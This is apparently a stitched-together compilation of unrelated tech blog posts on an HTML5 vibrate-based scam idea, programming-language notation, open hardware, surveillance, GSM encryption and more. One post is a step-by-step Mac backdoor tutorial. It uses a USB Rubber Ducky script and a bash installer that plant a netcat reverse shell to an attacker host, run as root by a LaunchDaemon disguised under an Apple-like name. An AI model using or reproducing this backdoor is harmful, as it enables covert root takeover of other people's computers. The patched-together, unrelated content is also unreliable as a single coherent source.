There is a new API in town! HTML5 will (soon) let you make the user's device vibrate. What fun! Obviously, it's useful for triggering alerts, improved immersivness during gameplay, and all sorts of other fun things like sending Morse Code messages via vibration.

At the moment, Chrome (and other Android browsers) ask for permission before accessing features such as geo-location, camera, address book etc. This is a security measure to prevent your private information leaving your hands without your knowledge.

At the moment, accessing the HTML5 Vibrate API doesn't trigger an on-screen warning. Its use is seen as pretty innocuous. Because, realistically, the worst it can do is prematurely drain your battery. Right?

I'm not so sure.

Evil Thoughts

We've all seen those scummy adverts designed to look like Windows pop-ups. They usually pose as a legitimate system request - "Update Java" or similar.

Suppose a malicious web page pops up a fake system notification and vibrates at the same time. How confident would you be of telling the difference between a legitimate pop-up and a .png on the web page you're viewing. After all, the phone buzzed - so it must be genuine.

Are you really receiving an "AirDrop" - or is this page trying to trick you?

Autoplaying sound on adverts in annoying - auto-vibration could be just as irritating. Imagine searching through tabs until you found the single advert which was pulsing away trying to get you to buy new insurance.

For now, the intensity of the vibration cannot be controlled - only the duration. It is not impossible to conceive of malicious code being able to exploit an unpatched browser flaw and overdrive the motor to destruction.

Faking Telephone Calls

When combined with HTML5 Audio, it would be possible to create a fairly realistic "Incoming Call" screen which vibrated and played a ringtone. Once "answered", the page could play some audio which says "Hi, can you call me back urgently - my number is [premium rate line]" and then, perhaps, automatically open up the dialer using the tel: URI.

Could you tell if the above was a real phone call? If you looked closely, probably, but when the browser is playing your phone's default ringtone and the handset is vibrating, it would be pretty easy to be confused. Combine it with a WebRTC call and you're looking at a very convincing scam.

Video Demo

Source Code

Here's a basic example which you can try on your own phone - demo site.

At the moment, the auto-vibrate and auto-ring only work on Firefox for Android. But no doubt other browsers will follow suite soon.

Warnings

Firefox was the only browser I found which supported Vibrate - on Android, neither Samsung's browser, Chrome, or Opera did - iPhone also doesn't yet support it. No one cares about Windows Phone or BlackBerry - so I didn't test them.

Firefox doesn't currently ask for permission when a page requests access to vibrate.

Do you think browsers should warn before a page vibrates - or is the risk too low? I guess we'll have to see if the scammers take advantage of it - and whether there is a user backlash.

There is a new API in town! HTML5 will (soon) let you make the user's device vibrate. What fun! Obviously, it's useful for triggering alerts, improved immersivness during gameplay, and...

In episode 3 of series 2 of Airwolf computer expert Dr. Karen Hanson has to deal with a “Logic Bomb” in Airwolf. This is first depicted by a screen full of hexadecimal numbers.

Subsequently she is seen listing with the LIST command an Apple BASIC program that produces a screen full of… random hexadecimal numbers. 

Debugging note: notice that the screen of hexadecimal does not contain the digit F at any point. This is because the code used to generate the random hexadecimal contains a bug. The INT(RND(1) * 15) + 1 will produce an integer from 1 to 15 and can never output 16 and hence the F from the string A$ is never chosen. This was pointed out by Mr Phlip.

This blog post is meant to help my friends get started in reading my other blog posts, that is, this post is a crash course on the notation used in programming language theory ("PL theory" for short). For a much more thorough introduction, I recommend Types and Programming Languages by Benjamin C. Pierce and Semantic Engineering with PLT Redex by Felleisen, Findler, and Flatt. I'll assume the reader is an experienced programmer but not an experienced mathematician or PL theorist. I'll start with the most basic definitions and try to build up quickly.

Sets, Tuples, Relations, and Definition by Rules

I suspect many readers will already be familiar with sets, tuples, and relations, but if you are not familiar with inductive definitions, then please make sure to read the subsection below titled Definition by Rules.

Sets

The main building block that we use in PL theory is the set, a collection of objects (also called elements), such as the set containing the first three natural numbers: The only thing that matters is whether an object is in the set or not; it doesn't make sense to ask if there are duplicates of an object or in what order the objects appear in the set. For example, the set is the same set as the set listed above. The notation means "in", so is true and is false. Sets may have an infinite number of elements, such as the set of all natural numbers (non-negative integers), written .

Tuples

Another building block is the tuple, which is an ordered collection of objects. So is a tuple of three elements and it is different from the tuple . The subscript notation retrieves the ith element of tuple . For example, if , then . Tuples contain only a finite number of elements and usually less than a handful. Sometimes angle brackets are used for tuples instead of parentheses, such as .

Relations

Putting tuples and sets together we get relations. That is, arelation is a set of tuples. We often use relations to represent a mapping from input to output. For example, the above relation can be thought of as mapping a natural number to its successor, that is, to the next greater natural number. The above definition is rather imprecise because of the elipses (). Fortunately, there are more precise notations for describing infinite sets and relations.

Definition by Rules

The main way that we define infinite sets in PL theory is by giving a list of rules for what is in the set. Let's use the name for the above relation. Then the following two rules give a precise definition of . Notice that the second rule is recursive in that it refers to itself. That's ok and quite common.

Some sets of rules are nonsensical and do not define a set. For example, rules should not be contradictory as in the following.

A common notation for rules such as the above uses a horizontal line in place of "if" and "then". For example, an equivalent definition of is given by the following. We have dropped the "For any natural numbers and " part of rule 2. The convention is that variables such as and that appear in a rule can be replaced by any object of the correct type, in this case, a natural number. Often the "correct type" is something you can deduce from the context of the discussion, in this case, the natural numbers.

Suppose that I claim that a particular element is in , say . You might respond by saying that you don't believe me. To convince you, I need to show you how the rules justify that , that is, I need to show you a derivation. A derivation is a chaining together of rules, replacing variables such as and with particular objects and replacing premises such as with sub-derivations. I've labelled each step in the derivation with the rule number.

The fancy name for what I'm calling Definition by Rules isinductive definition. (My daughter love the Fancy Nancy series of books.)

Language Syntax and Grammars

It turns out that using rules to defines sets, as we did above, is how we define the syntax of a programming language. Suppose we'd like to define a simple language of integer arithmetic, call it , including expressions such as 1 + 3 and -(5 + 2). Recall that is the set of all integers. Then here's a bunch of rules that we might use to define :

• For any , .
• For any , if , then -.
• For any and , if and , then .
• For any , if , then .

Backus-Naur Form (BNF) is another common notation for writing rules that define the syntax of a language, but the meaning is the same. (There are several variations on BNF; I forget which one I'm using here.) The bunch of rules is referred to as a grammar.

Arith ::= integer
Arith ::= "-" Arith
Arith ::= Arith "+" Arith
Arith ::= "(" Arith ")"

Arith ::= integer | "-" Arith | Arith "+" Arith | "(" Arith ")"

The notion of derivation coincides with that of a parse tree, they both demonstrate why a particular element is in a set.

Operational Semantics

A language is brough to life by defining what it means to run a program in the language, that is, the operational semantics of a language. In the case of , we just need to specify the integer output of each program. As discussed above, relations can be used to map inputs to outputs, and indeed, we typically use relations for this purpose in PL theory. There's several different styles of relations, the first we'll discuss is a big-step style of semantics that maps a program directly to its output.

Big-step Semantics

Let's define a relation that maps elements of to integers. For example, we'd like to have . This relation will be infinite (because there are an infinite number of programs in ), so again we'll use a bunch of rules to define . But before we start, it's common to introduce some shorthand: means . Below we state the rules that define using the horizontal notation. To make sure we don't leave out any programs, we create one rule for each syntactic rule of (there are three). We say that the rules are sytnax-directed when there is one rule for each syntactic rule in the language. It may seem a little odd that I'm defining - in terms of , and similarly for +. Isn't that circular? No, the and are the usual arithmetic operators for integers that everyone learned in grade school. In this way, the language is rather odd in not using 32 or 64-bit arithmetic. An implementor of would have to use a big-integer package to properly handle the arithmetic.

Small-step Semantics

The second, and perhaps more common, style of operational semantics issmall-step semantics. In this style, the relation doesn't map a program to its output, but instead it maps a program to a slightly simplified program in which one subexpression has been computed. This style of semantics can be thought of as textual rewriting. To give an example of this style, let's define a relation named . We'll want this relation to have the following elements, among many others: Again, we'll introduce shorthand: means . Also, we'll chain together steps, so means and . The term reduce is a synonym for step. The above example of two steps can now be written as OK, on to the rules that define the relation. There are five rules, which we explain below. Rules (1) and (2) are the most interesting; they perform the arithmetic. We call them computational reduction rules. Rules (3-5) allow us to reach inside of sub-expressions to perform computation. They are often called congruence rules for reasons we won't go into. The use of the variable in rule (5) means that reduction proceeds from left to right. In particular, we're not allowed to reduce the right-hand expression of a plus until we've already reduced the left-hand side to an integer.

Aside: This left-to-right ordering is a choice that I made as the designer of this example language. I could have not specified an ordering, letting it be non-deterministic. However, this example language doesn't have side-effects, so the ordering doesn't matter! However, most language do have side-effects and they do specify an ordering (but not all!), so I thought to include an example of how ordering is typically specified.

Time for an example: let's see the derivation of the step .

We've defined a single step of computation, the relation, but we're not quite done. We still need to specify what it means to run a program to completion. We'll do this by defining a relation in terms of the relation as follows. In plain Engilish, the relation will contain any pair if expression reduces to integer in zero or more steps. Some of the notation here is new and is explained below. The notation is the set builder or set comprehension notation for defining a set. The stuff to the left of the vertical bar is a template for a typical element of the set and the stuff to the right of the vertical bar places restrictions on the elements in the set. The notation means zero or more steps. I like to define this multi-step relation with the following rules: (My brain is good at reasoning about Lisp-style lists, so I think of the first rule as nil and the second rule as cons.)

Type Systems (with the Lambda Calclus as an example)

Many programming languages are statically typed, that is, the compiler performs some sanity checking before proceeding with the actual work of compiling. The checking usually involves make sure that objects are only used as intended, for example, not trying to treat an integer as if it were a function. The way a programming language designer (PL theorist) specifies what kind of sanity checking should be performed is by defining a type system for the language. The language is so simple that there is no interesting type checking to be performed. Let's consider a slightly larger language that also happens to be used over and over again in PL theory, the lambda calculus (technically, the simply-typed lambda calculus). The lambda calculus just consists of first-class anonymous functions. Here we'll extend the lambda calculus to also include our arithmetic expressions. So now our example language is defined by the following grammar. The variable ranges over parameter names, such as foo and g. Two expressions right next to each other denote function application (i.e., function call). So if you're familiar with the C language, read as . In the lambda calculus, functions only take one parameter, so function calls only require one argument. The syntax creates a function with one parameter named of type (types will be defined shortly) and whose body is the expression . (A common point of confusion is to think that is the name of the function. It instead is the parameter name. The function is anonymous, i.e. it doesn't have a name.) The return value of the function will be whatever the expression evaluates to.

Now let's consider what kind of objects will be alive when we run the program: there's integers and functions. We'll create a set oftypes to describe the kinds of objects, using to range over the set of types. In a function type , the is the type of the parameter and is the return type.

The job of a type system is to predict which type of value will be produced by an expression. For example, the expression -(5 + 2) should have the type Int because the result of -(5 + 2) is -3, which is an integer. As with the syntax and operational semantics of a language, PL theorists use relations and rules to define a type system. We'll define a relation named that, as a first approximation, maps expressions to types, so for example, we'll have .

However, because the lambda calculus includes variables, we'll need something analogous to a symbol table, a relation called atype environment, to keep track of which variables have which types. The Greek letter (gamma) is traditionally used for this purpose. We'll need to be able to create new type environments from old ones, potentially overshadowing variable definitions from outer scopes. To set up the mathematical machinery for that, we define to be the relation just like except that any tuple starting with is removed. (The way the type system will be defined, there may be 0 or 1 tuple that starts with , making the type environment a special kind of relation called a partial function.) We'll write for the operation of extending a type environment with variable x, possibly overriding a previous definition, and define it as follows: Suppose we have Then

One way in which type environments are different from the global symbol table in a compiler is that there isn't just one type environment, there will be lots of them, one for each scope. Further, we won't ever update a type environment in place, we'll keep creating new ones that differ a little bit from the old ones. From a programming perspective, the mathematical metalanguage we're using here is pure functional, that is, it doesn't use state or side effects. The reader might worry that this might lead to inefficiency, but remember, we're not writing a program here, we're writing a specification! Clarity is what matters most in this setting, and staying pure helps to make things clear.

Getting back to the relation, instead of containing 2-tuples (pairs) it will contain 3-tuples (triples) of the form , so we'll be assigning types to expressions in the context of a type environment. As yet more shorthand (PL theorists love shorthand!), we'll write instead of . We're now ready to write down the rules that define . To sum up the above rules, the arithmetic operators work on integers, variables get their types from the environment, lambdas are given function types based on their parameter type and their deduced return type, the body of a lambda is checked using the environment from the point of creation (this is lexical scoping) extended with the lambda's parameter, and function application is sane so long as the argument's type is the same as the parameter type.

Conclusion

Thus ends this crash course on the notation used in programming language theory. This blog post only scratches the surface, but much of the additional notation that you'll need is variations on what's covered here. Happy reading! And P.S., feel free to ask questions in the form of comments to this blog.

Often times, physical access to a machine means game over. This is especially true for Apple boxes. Mac OSX is capable of booting into single user mode by holding a special key combination (Command-S). From this point, the attacker has root access to the entire computer. While of course the intruder needs to be physically present, this can become a huge security problem. There is proven method for preventing this attack that I will cover at the end of the article.

Since physical access to the machine is required, time is precious and must be cut to a minimum. There are two methods for optimizing time, scripts and a little tool called the USB Rubber Ducky. The Rubber Ducky is small HID that looks like a flash drive and acts like a keyboard. It is designed to pound out scripts at freakish speeds, as if you were typing it yourself. Of course, a flash drive will work too.

This backdoor is almost identical to the basic backdoor described in OSX Backdoor – Persistence. Read that article if you would like to better understand the inner workings of this backdoor. Similarly, we will create a script that sends a shell back home through netcat. Finally, we will add the script as a Launch Daemons where it will be executed as root every 60 seconds.

The Rubber Ducky Method

1) Download the Ducky Decoder and Firmware from here.

Be sure to use duck_v2.1.hex or above. There are instructions on how to flash your ducky. At the time of writing this, I used Ducky Decoder v2.4 and duck_v2.1.hex firmware. (Special thanks to midnitesnake for patching the firmware)

2) Create the script source.txt.

Be sure to replace mysite.com with your IP address or domain name. Similarly, place your port number 1337 on the same line.

REM Patrick Mosca
REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER

3) Compile and install the script.

From within the ducky decoder folder, execute:

java -jar encoder.jar -i source.txt -o inject.bin -l us

Move your inject.bin over to the ducky.

4) Boot into single user mode (Command – S).

5) At the command prompt, plug in ducky.

6) Catch your shell.

nc -l -p 1337

nc -l 1337

Say hello! You are now root

The USB Flash Drive Method

1) Create the file install.bash on a flash drive.

#!/bin/bash
#Create the hidden directory /Library/.hidden
mkdir /Library/.hidden
#Copy the script to hidden folder
echo "
#!/bin/bash
bash -i >& /dev/tcp/mysite.com/1337 0>&1
wait" > /Library/.hidden/connect.sh
#Give the script permission to execute
chmod +x /Library/.hidden/connect.sh
#Create directory if it doesn't already exist.
mkdir /Library/LaunchDaemons
#Write the .plist to LaunchDaemons
echo '<plist version="1.0"><dict><key>Label</key><string>com.apples.services</string><key>ProgramArguments</key><array><string>/bin/sh</string><string>/Library/.hidden/connect.sh</string></array><key>RunAtLoad</key><true/><key>StartInterval</key><integer>60</integer><key>AbandonProcessGroup</key><true/></dict></plist>
' > /Library/LaunchDaemons/com.apples.services.plist
chmod 600 /Library/LaunchDaemons/com.apples.services.plist
#Load the LaunchAgent
launchctl load /Library/LaunchDaemons/com.apples.services.plist
shutdown -h now

2) Boot into single user mode (Command – S).

3) Execute the commands.

mount -uw /
mkdir /Volumes/usb
ls /dev
mount_msdos /dev/disk1s1 /Volumes/usb
cd /Volumes/usb
./install.bash

disk1s1 will change! If you’re not sure which device is your flash, take out your device, list devices, put your flash drive back in, and list devices. Your flash drive will be the device that has come and gone.

4) Catch your shell.

nc -l -p 1337

nc -l 1337

The difference between the USB Rubber Ducky method and the flash drive method is night and day. There is a little more preparation that goes into setting up the ducky, but execution time is prime. When time is of the essence, listing devices, making directories, and mounting flash drives can impede on an “operation.” Either route you choose, both methods will ensure a persistent backdoor as the root user

As for preventing this lethal attack, there are two possible defenses. Locking the EFI firmware will prevent users from accessing single user mode by locking single user mode with a password. Don’t do this. It is a complete waste of time. The password can be reset by removing physical RAM and resetting the PRAM as described here. The only sure way to prevent unwanted root access to your system is by simply enabling File Vault’s full disk encryption (not home folder encryption!). Since this encrypts the entire drive, it is will be impossible to access single user mode without the (strong) password. Problem solved.

This article was written to show the vulnerabilities of Macs without full disk encryption or locked EFI firmware. Please no one get in trouble. It is very easy to sniff the wire and find the attacker’s IP address that is causing excessive noise every 60 seconds.

Project Novena—an open source laptop

About a year and a half ago, I engaged on an admittedly quixotic project to build my own laptop. By I, I mean we, namely Sean “xobs” Cross and me, bunnie. Building your own laptop makes about as much sense as retrofitting a Honda Civic with a 1000hp motor, but the lack of practicality never stopped the latter activity, nor ours.

My primary goal in building a laptop was to build something I would use every day. I had previously spent several years at Chumby building hardware platforms that I’m ashamed to admit I rarely used. My parents and siblings loved those little boxes, but they weren’t powerful enough for a geek like me.

I try to allocate my discretionary funds towards things based on how often I use them. Hence, I have a nice bed, as I spend a third of my life in it. The other two thirds of my life is spent tapping at a laptop (I refuse to downgrade to a phone or tablet as my primary platform), and so when picking a thing to build that I can use every day, a laptop is a good candidate.

I’m always behind a keyboard!

The project was also motivated by my desire to learn all things hardware. Before this project, I had never designed with Gigabit Ethernet (RGMII), SATA, PCI-express, DDR3, gas gauges, eDP, or even a power converter capable of handling 35 watts – my typical power envelope is under 10 watts, so I was always able to get away with converters that had integrated switches. Building my own laptop would be a great way for me to stretch my legs a bit without the cost and schedule constraints normally associated with commercial projects.

The final bit of motivation is my passion for open hardware. I’m a big fan of opening up the blueprints for the hardware you run – if you can’t hack it, you don’t own it. Here are the blueprints.

Back when I started the project, it was me and a few hard core open ecosystem enthusiasts pushing this point, but Edward Snowden changed the world with revelations that the NSA has in fact taken advantage of the black-box nature of the closed hardware ecosystem to implement spying measures—“good news, we weren’t crazy paranoids after all”.

Our Novena Project is of course still vulnerable to techniques such as silicon poisoning, but at least it pushes openness and disclosure down a layer, which is tangible progress in the right direction. While these heady principles are great for motivating the journey, actual execution needs a set of focused requirements.

And so, the above principles boiled down to the following requirements for the design:

• All the components should have a reasonably complete set of NDA-free documentation. This single requirement alone culled many choices. For example, Freescale is the only SoC vendor in this performance class where you can simply go to their website, click a link, and download a mostly complete 6,000-page programming manual. It’s a ballsy move on their part and I commend them for the effort.
• Low cost is not an objective. I’m not looking to build a crippled platform based on some entry-level single-core SoC just so I can compete price-wise with the likes of Broadcom’s non-profit Raspberry Pi platform.
• On the other hand, I can’t spec in unicorn hair, although I come close to that by making the outer case from genuine leather (I love that my laptop smells of leather when it runs). All the chips are ideally available off the shelf from distributors like Digi-Key and have at least a five year production lifetime.
• Batteries are based off of cheap and commonly available packs used in RC hobby circles, enabling users to make the choice between battery pack size, runtime, and mass. This makes answering the question of “what’s the battery life” a bit hard to answer – it’s really up to you – although one planned scenario is the trans-Siberian railroad trek, which is a week-long trip with no power outlets.
• The display should also be user-configurable. The US supply chain is weak when it comes to raw high-end LCD panels, and also to address the aforementioned trans-Siberian scenario, we’d need the ability to drive a low-power display like a Pixel Qi, but not make it a permanent choice. So, I designed the main board to work with a cheap LCD adapter board for maximum flexibility.
• No binary blobs should be required to boot and operate the system for the scenarios I care about. This one is a bit tricky, as it heavily limits the wifi card selection, I don’t use the GPU, and I rely on software-only decoders for video. But overall, the bet paid off; the laptop is still very usable in a binary-blob free state. We prepared and gave a talk recently at 30C3 using only the laptops.
• The physical design should be accessible – no need to remove a dozen screws just to pull off the keyboard. This design requires removing just two screws.
• The design doesn’t have to be particularly thin or light; I’d be happy if it was on par with the 3cm-thick Thinkpads or Inspirons I would use back in the mid 2000′s.
• The machine must be useful as a hardware hacking platform. This drives the rather unique inclusion of an FPGA into the mainboard.
• The machine must be useful as a security hacking platform. This drives the other unusual inclusion of two Ethernet interfaces, a USB OTG port, and the addition of 256 MiB DDR3 RAM and a high-speed expansion connector off of the FPGA.
• The machine must be able to build its own firmware from source. This drives certain minimum performance specs and mandates the inclusion of a SATA interface for running off of an SSD.

After over a year and a half of hard work, I’m happy to say our machines are in a usable form. The motherboards are very reliable, the display is a 13-inch 2560×1700 (239 ppi) LED-backlit panel, and the cases have an endoskeleton made of 5052 and 7075 aluminium alloys, an exterior wrapping of genuine leather, an interior laminate of paper (I also love books and papercraft), and cosmetic panels 3D printed on a Form 1. The design is no Thinkpad Carbon X1, but they’ve held together through a couple of rough international trips, and we use our machines almost every day.

Laptop parked in front of the Form1 3D printer used to make its body panels.

I was surprised to find the laptop was well-received by hackers, given its home brew appearance, relatively meagre specs and high price. The positive response has encouraged us to plan a crowd funding campaign around a substantially simplified (think “all in one PC” with a battery) case design: that’s right, the final design will not look like these early, hand-built prototype cases.

The first two prototypes are wrapped in red sheepskin leather, and green pig suede leather.

Detail view of the business half of the laptop.

We think it may be reasonable to kick off the campaign shortly after Chinese New Year, maybe late February or March. Follow @novenakosagi for updates on our progress!

At a recent RSA Security Conference, Nico Sell was on stage announcing that her company—Wickr—was making drastic changes to ensure its users' security. She said that the company would switch from RSA encryption to elliptic curve encryption, and that the service wouldn't have a backdoor for anyone.

As she left the stage, before she'd even had a chance to take her microphone off, a man approached her and introduced himself as an agent with the Federal Bureau of Investigation.  He then proceeded to "casually" ask if she'd be willing to install a backdoor into Wickr that would allow the FBI to retrieve information.

A Common Practice
This encounter, and the agent's casual demeanor, is apparently business as usual as intelligence and law enforcement agencies seek to gain greater access into protected communication systems. Since her encounter with the agent at RSA, Sell says it's a story she's heard again and again. "It sounds like that's how they do it now," she told SecurityWatch. "Always casual, testing, because most people would say yes."

The FBI's goal is to see into encrypted, secure systems like Wickr and others. Under the Communications Assistance for Law Enforcement Act (CALEA) legislation, law enforcement can tap any phone in the US but they can't read encrypted communications. We've also seen how law enforcement have followed the lead of the NSA, and gathered data en-masse from cellphone towers. With the NSA reportedly installing backdoors onto hardware sitting in UPS facilities and allegedly working to undermine cryptographic standards, it's not surprising that the FBI would be operating along similar lines.

The Difference
It was clear that the FBI agent didn't know who he was dealing with, because Sell did not back down. Instead, she lectured him on topics ranging from the First and Fourth Amendments to the Constitution, to George Washington's creation of a Post Office in the US. "My ancestor was a drummer boy under Washington," Sell explained. "Washington thought it was very important to have freedom of information and private correspondence without government surveillance."

Her lecture concluded, she proceeded to grill the agent. "I asked if he had official paperwork for me, if this was an official request, who his boss was," said Sell. "He backed down very quickly."

Though she didn't budge for the agent, Sell makes it clear that surveillance and security is a complicated issue. "Ten years ago, I'd have said yes," said Sell. "Because if law enforcement asks you to catch bad guys, who wouldn't want to help?"

The difference now, she explained, was her experiences at BlackHat. Among those, Sell pointed to a BlackHat event where Thomas Cross demonstrated how to break into lawful intercept machines—or wiretaps. "It was very clear that a backdoor for the good guys is  always a backdoor for the bad guys."

How To Be A Good Guy
"I'm not against helping law enforcement, but the most important thing to me is protecting my friends and family the best way I know how," said Sell. She suggested that the NSA and other agencies go back to a model where individuals are targeted, instead of monitoring all communications and sorting it out later. "There are plenty of ways to track people without trampling human rights," she said.

As an example of how to do security right, Sell unsurprisingly pointed to Wickr. She said that her company does not hold the encryption keys to decrypt users' messages, or see their identities. That way, should Wickr be compelled to hand over data from a court order, investigators will only find junk. And in addition to employing who Sell calls the "best crypto people," Sell said that individual messages are bound to their intended device. "Even in 20 years or 100 years, if the NSA miraculously breaks these [encryption] equations, they still wouldn't be able to read these messages."

It's clear that for Sell, this is about more than good security. "I'm doing the right thing here, and it's the right thing for them, too," she said. "I'm not afraid of them."

Image via Flickr user Marco Monetti

Oculus VR has been showing off a new version of its virtual reality technology at the Consumer Electronics Show. According to Vice President of Product Nate Mitchell, the “Crystal Cove” prototype features two big improvements — positional tracking and low persistence.

I have to admit that when Mitchell first said this, I started to worry that these were going to be minor changes, only relevant to hardcore gamers and serious virtual reality geeks. Then I tried out the new prototype and, well, it was kind of amazing.

You can see me trying out the prototype in the video above. Ignoring the fact that I look pretty goofy as I swerve around (or, fine, don’t ignore it) — I think it’s pretty clear that I’m having a great time.

The more noticeable change is the positional tracking. Basically, it means that in addition to responding to where you look, the Oculus headset can also track the position of your head — if you lean left or right or forward or backward. So in the first demo, a tower defense game, I could lean in and see the details of the individual figures running around the screen, or I could lean back and see the full scope of the playing field.

The other addition, low persistence, is supposed to eliminate motion blur — so when I shifted my head in the second demo, I could still read the text on the computer screens.

The bottom line is that the experience felt much, much more immersive and real than it was when I tried a much earlier prototype at last year’s CES. Granted, some of that is also because the demo involved more sophisticated and beautiful gameplay, but hey, some of that gameplay was enabled by the new features.

As for when you’ll get to try all of this out, Mitchell said the company isn’t ready to make any specific announcements, but he suggested that Oculus will probably want to ship one more round of kits out for developer testing before releasing a version for consumers. He also said that everything I tried out at CES will be available in the consumer version.

Oculus, by the way, recently raised a $75 million round led by Andreessen Horowitz.

LES SAKEN PÅ NORSK

Leaked Snowden documents that Washington Post has published, show that the US intelligence agency National Security Agency (NSA) breaks one of the encryption standards that are used to protect cell phones from eavesdropping.

Encryption is like a mathematical lock that prevents hackers and others from opening the encrypted content.

It is the A5/1-encryption standard which can be broken, a standard which is used by many cell phone users both in Norway and the rest of the world.

Here is the story about how the A5/1-encryption standard is much weaker than it probably could have been.

The birth of GSM

Experts from all over Western Europe came together in 1982 to build a new system for mobile telephones. The system was realised 10 years later, and is the one we now call GSM.

Jan Arild Audestad has been an employee of Telenor in many years and has also been a professor at Gjøvik Universty College and the Norwegian University of Science and Technology.

- Originally we proposed that the encryption key length should be 128 bit, because we knew little about cryptographic systems, and how secure they were. The request was that the keys and algorithms should be secure at least for 15 years after the installation, Audestad tells.

A bit is the least component in digital information. A bit can be set to 0 or 1.

- Pushed by the Brits

But why was the result not 128 bit? The A5/1-encryption is still only 54 bit.

The difference can be illustrated by numbers (see the more detailed description to the right of this article). Or with the thickness of a door to a safe. For every bit the encryption is increased, the thickness of the safe door is doubled – instead of having a safe which is a few centimetres thick, the safe is expanding far into the universe.

Audestad says that the British were not very interested in having a strong encryption. And after a few years, they protested against the high security level that was proposed.

- They wanted a key length of 48 bit. We were very surprised. The West Germans protested because they wanted a stronger encryption to prevent spying from East Germany. The compromise was a key length of 64 bit – where the ten last bits were set to zero. The result was an effective key length of 54 bit.

Do you have any information about this story? Contact the journalist on e-mail, send info to our encrypted whistleblower portal or send regular mail to Arild Færaas.

- Still angry

Aftenposten has spoken to several people who together with Audestad co-operated on building the GSM network.

One of them is Peter van der Arend from Netherlands. He tells Aftenposten how he «fought» with the British about this case – especially in a meeting in Portugal.

- The British argued that the key length had to be reduced. Among other things they wanted to make sure that a specified Asian country should not have the opportunity to escape surveillance.

Van der Arend was very opposed to the British proposal.

- The length was increased by the British – two bits at the time. They did not want to go further than 54 bits. And even though I argued against it, I eventually lost support from the others. And from that moment we had weaker security, and I am still angry about this.

Thomas Haug, who was one of the most central persons in the making of GSM, also says that he was put pressure on by the British.

- I was told by a British delegate that the British secret services wanted to weaken the security so they could eavesdrop more easily.

Cold war

Despite glasnost and perestroika towards the end of the 1980’s, the cold war was still ongoing, the Berlin Wall had still not fallen, and the suspicion between the West and the East was huge.

According to our sources, this also affected the work with GSM. As it is today, it was not easy to find the right balance between the individual’s right to privacy, and the states’ need for spying and intelligence.

Audestad says that he does not know why the UK wanted a weak encryption. But he speculates that the reason could be that their secret services wanted to be able to eavesdrop more easily.

According to Audestad this was the reason that 128 bit was the original proposal: A crypto expert said that then the key would certainly be uncrackable.

- Even today that is correct, says Audestad.

We cannot rule out the option that NSA now has the capacity to crack 128 bit encryption. But several experts we have spoken to, says that is very unlikely, unless there is another weakness in the encryption.

The British security researcher Ross Anderson has written about some of the aspects of the story Aftenposten now brings.

In the book Security Engineering he wrote that there were weaknesses in the first GSM encryption because several of the European intelligence agencies pushed for weaker security.

He has no open sources on this. Aftenposten cannot rule out the possibility that there were other countries than the UK that pushed for weaker encryption, but we have no sources who confirms that.

- Political and practical reasons

Michel Mouly from France was one of the other central people in the making of GSM.

He cannot confirm that the British were pushing for weaker encryption. But he confirms that the encryption was not as strong as planned, due to political pressure.

Mouly also confirms that it would have been technological possible to have a much stronger encryption than what the result became.

- It was political and practical reasons that the encryption did not become stronger.

The French also says that if the encryption would have been stronger than what the export control regimes accepted, it would have been illegal to bring the cell phones to Eastern Europe.

Aftenposten has not been able to get comments from any British who were involved in the work with GSM security. Neither have we got any British authorities to answer for the claims. We have contacted Ofcom, Home Office og Foreign & Commonwealth Office.

Was 128 bit technically possible?

Audestad tells that his group in the 1980’s had been in contact with a German company who said that it was possible to implement an encryption of 128 bit.

Leif Nilsen, a Norwegian cryptography expert, confirms to Aftenposten that it would have been technically possible to have an encryption of 128 bit in the GSM network from the start.

- The system would have worked, but it could have had some effects on the performance.

Other sources we have spoken to points out that it is not certain that a 128 bit encryption would have worked.

Van der Arend, Mouly and Haug will not reject the possibility that there was originally a proposal for a 128 bit encryption. But they can neither confirm it.

Still, if Audestad remembers wrongly about the 128 encryption and the encryption «only» was weakened from 64 to 54 bit encryption – we are still now having an encryption that is about 1000 times weaker than originally planned.

That means that it probably would have taken longer time for NSA and others to crack the encryption, and a certain amount of eavesdropping would have been avoided.

The cryptographer Leif Nilsen also points out that the key length in itself is no guarantee to consider how strong an encryption algorithm is.

- It is possible to make 128 bit-algorithms that give less security than one with 64 bit.

The encryption can be turned off

One other thing that was put in the GSM specification, after demands from some countries, was that the encryption could be turned off, without the cell phone user knowing.

Michel Mouly from France tells us that he has seen the encryption in the GSM network turned off.

He will not say which countries, but it was not in any Western European countries.

When the encryption is turned off, it is also quite easy for private citizens with the right equipment to eavesdrop on cell phone calls.

We should also point out that even though the encryption over the radio waves is very strong and uncrackable, that does not mean that eavesdropping on phone calls is impossible. If you gets directly into the network, by hacking or other methods, it is possible to listen to unencrypted calls.

Today we’re excited to announce a Deployments API. We ship a lot of software at GitHub: web, mobile, and native. For the last few years, we’ve been driving our deployments from our ChatOps tooling and we’ve learned a lot. The Deployments API is a generalization of the approach that we’ve been taking, and we’re really excited to see what our users and integrations start building around it.

